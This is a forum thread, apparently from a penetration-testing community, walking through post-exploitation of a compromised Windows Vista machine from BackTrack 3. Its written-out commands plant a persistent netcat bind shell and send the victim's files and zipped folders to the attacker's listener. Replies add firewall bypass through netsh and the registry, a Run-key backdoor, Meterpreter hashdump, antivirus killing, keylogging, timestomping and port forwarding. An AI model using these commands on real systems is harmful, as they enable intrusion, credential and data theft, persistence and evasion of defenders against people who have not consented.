How to transfer files from vista to BT3 after exploitation

[kazalku]

This 'Howto' is written to explain post-exploitation file-transfers from vista box to BT3 box.
This process doesn't work if the windows firewall is on. Somebody has to research and find a way to turn it off during the meterpreter session.

I'm assuming that:
1) You are testing this with your own machines or you have permission to penetrate the vista box.
2) You've already got a meterpreter session running. If not, may be this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
3) You've downloaded nc (netcat) for windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
4) You've downloaded psexec.exe to execute process remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip

Now, we've got our tools. Let's start with uploading the required files. They can be uploaded to the root folder or make a new folder by mkdir command. Say, we like to upload our files in c:\xxx folder of the victim (vista) box. So, go to c drive & prepare the folder.

Code:

cd c:\
mkdir xxx
ls
cd xxx

The ls will show you that the folder has been created.
Open root directory of BT3 box and unzip the nc111nt.zip & PsTools.zip files.

Uploading the files
We just need 2 files. Upload them:

Code:

upload /root/nc111nt/nc.exe nc.exe
upload /root/PsTools/psexec.exe psexec.exe
ls

The ls will show you that the files have been uploaded.

Opening the backdoor
Open a command shell by entering this on meterpreter field:

Code:

execute -f cmd.exe -c -H -i

Run nc & keep it running (that's our backdoor) to keep 8888 port open:

Code:

psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888

Here, username & password are admin username & password of vista box. You should already know this (coz you own the box, don't you). In the real world, it's possible to crack these but this is not covered in this tut.

Using backdoor to transfer file
OK...now as we've got our door, you can press Ctrl+C to terminate command shell & then type exit to close meterpreter session. Open a fresh konsole & use telnet to connect to the victim anytime:

Code:

telnet 192.168.x.x 8888

Here 192.168.x.x is victim's IP address. In my case, it's 192.168.1.2

You should see:

Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

We will call this "Shell"

Files can be transferred from any location of vista box to any location in the BT3 box as long as correct file path is provided.
To receive the xxxx.txt file in BT3 box to yyyy directory in root, first prepare BT3 box. Open another konsole & enter:

Code:

nc  -vv -l -p 10000 > /root/yyyy/xxxx.txt

Now, to send the file from zzzz folder within C drive of Vista Box, go to the "Shell", & enter:

Code:

nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt

Here, 192.168.y.y is BT3 box (attacker) IP address.

The file should be downloaded to desired folder.
ENJOY!!!!!!!!!!




Reference:
http://linux.byexamples.com/archives...e-with-netcat/
http://forums.remote-exploit.org/showthread.php?t=20858

[X-Ray Cat]

Thanks verry good tutorial

[kazalku]

Thanks verry good tutorial

You are most welcome. I posted this tut a while ago and didn't get any response at all, so assumed that I did something sh*tty.

[s@my_]

I usually use the TFTP server to download or upload file in the victim machine.
I wanna know how to download not only a file from a victim machine but a directory using the netcat or the TFTP server.
If it is possible, please tell me how.

[kazalku]

I usually use the TFTP server to download or upload file in the victim machine.
I wanna know how to download not only a file from a victim machine but a directory using the netcat or the TFTP server.
If it is possible, please tell me how.

Well, there may be other ways, but I like to do it as follow:

1. download PKZIP 2.04 (93.02.01) PKZIP.EXE (42 KB) from http://www.uv.tietgen.dk/staff/mlha/Download/dos/
   
2. Upload it to xxx folder in victim box
   
   Code:

   upload /root/pkzip.exe pkzip.exe

3. Then if your purpose is to download "test" folder from victim box compress it to make a zip file:
   
   Code:

   pkzip.exe test.zip c:\test\*.*

4. Then just follow the file transfer procedure to download it to BT box.

Hope that it's clear....

[s@my_]

Very clear, thank u kazalku for this solution.

[kazalku]

Glad to be of help

[adri_ht_]

Let's add some more ingredients to the soup.

In case a windows firewall is in place, we can do the following to bypass it:

Code:

C:\>netsh firewall set allowedprogram %systemroot%\system32\nc.exe

In this case, nc.exe was placed in the system32 directory. You can also disable the firewall altogether as well as opening particular ports. Try the help menu which is really good!

Code:

netsh firewall set /?

Enjoy!

[kazalku]

I was too lazy to add this........
Cheers mate

[brtw2003]

hi,

just curious, you have already exploited the box with msf3 - so just a stupid question, but why not using msf3 to transfer files and using a reverse shell/portfwd to avoid firewall issues (of course if you don't wanna have an additional backdoor with nc)?


some nifty other things to do on the (wind0ws) target:

meterpreter > use priv <<<<needed for timestomp & hashdump
meterpreter > run getgui
meterpreter > run killav
meterpreter > run winemun
meterpreter > hashdump
meterpreter > ps <<<<get a list of running processes which could be then used for the migrate command

using the keylogger function (you have to look for the winlogon.exe process id and migrate your session to this id)
meterpreter > migrate {winlogon.exe process id}
meterpreter > keyscan_start <<<<no you have to wait that user logins and types in someting..
meterpreter > keyscan_dump

manipulating firewall is also possible with the msf3 reg inbuilt function:

meterpreter > reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v nc -d "C:\Windows\system32\nc.exe:*:Enabled:nc"

if you don't wanna use psexec, you can also use mfs3 do this:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 8888 -e cmd.exe"

changing file times is also not a bad thing to do:

meterpreter > timestomp C:\\windows\\system32\\nc.exe -f C:\\windows\\system32\\cmd.exe

if you don't wanna to the extra step to upload netcat - just use the msf3 port forwarding:

meterpreter> portfwd -a -L 127.0.0.1 -l 446 -h schaeuble.bnd.de -p 3389
;-))


Great scripts for msf3 can be found here:
hxxp://www[.]darkoperator[.]com/meterpreter/


/brtw2003